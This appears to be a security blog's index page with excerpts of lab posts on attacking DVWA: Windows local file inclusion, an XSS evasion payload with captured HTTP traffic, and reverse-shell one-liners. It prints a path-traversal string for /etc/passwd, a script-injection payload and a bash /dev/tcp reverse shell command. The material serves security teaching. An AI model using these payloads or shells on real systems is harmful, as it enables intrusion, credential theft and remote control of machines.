DVWA Damn Vulnerable Web App Windows Local File Inclusion (LFI) Attack

Local File Inclusion Attack Using DVWA and Windows: You can notice the directory structure and attack is different than on Linux/Unix machines, for Windows attacks you need to include the C:\ for Local File Inclusion where in *nix you can usually just go backwards like ../../../../etc/passwd Converted PCAP: 2015-05-02 19:49:09.235706 IP 192.168.1.100.44344 > 192.168.1.101.80: Flags… Read More »

Cross Site Scripting Evasion XSS OWASP PCAP Network Traffic Output

Easy evasion – <script>alert(String.fromCharCode(88,83,83))</script> 2015-05-01 20:23:45.908832 IP 192.168.1.100.43980 > 192.168.1.101.80: Flags [P.], seq 3207:3725, ack 24881, win 633, options [nop,nop,TS val 1687284507 ecr 115747653], length 518 E..:..@.@……d…e…P#.h..D…..y.F….. d…..+EGET /dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E HTTP/1.1 Host: 192.168.1.101 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.101/dvwa/vulnerabilities/xss_r/ Cookie: security=low; PHPSESSID=n473gcv8qrbmog7t21mldhn664 Connection: keep-alive… Read More »

Simple ways to create PHP, Python, PERL, xterm, bash, exec, java and Netcat Reverse Shells

Spawning a bash reverse shell – tested on Ubuntu bash -i >& /dev/tcp/192.168.1.100/4444 0>&1 you can also open a socket like this on most Linux machines: exec 3<>/dev/tcp/localhost/4444 If you want to read and write to the socket you can use echo or cat, example: cat <&3 SSH-2.1-OpenSSH_6.2 This is called pseudo-path interpreted by bash,… Read More »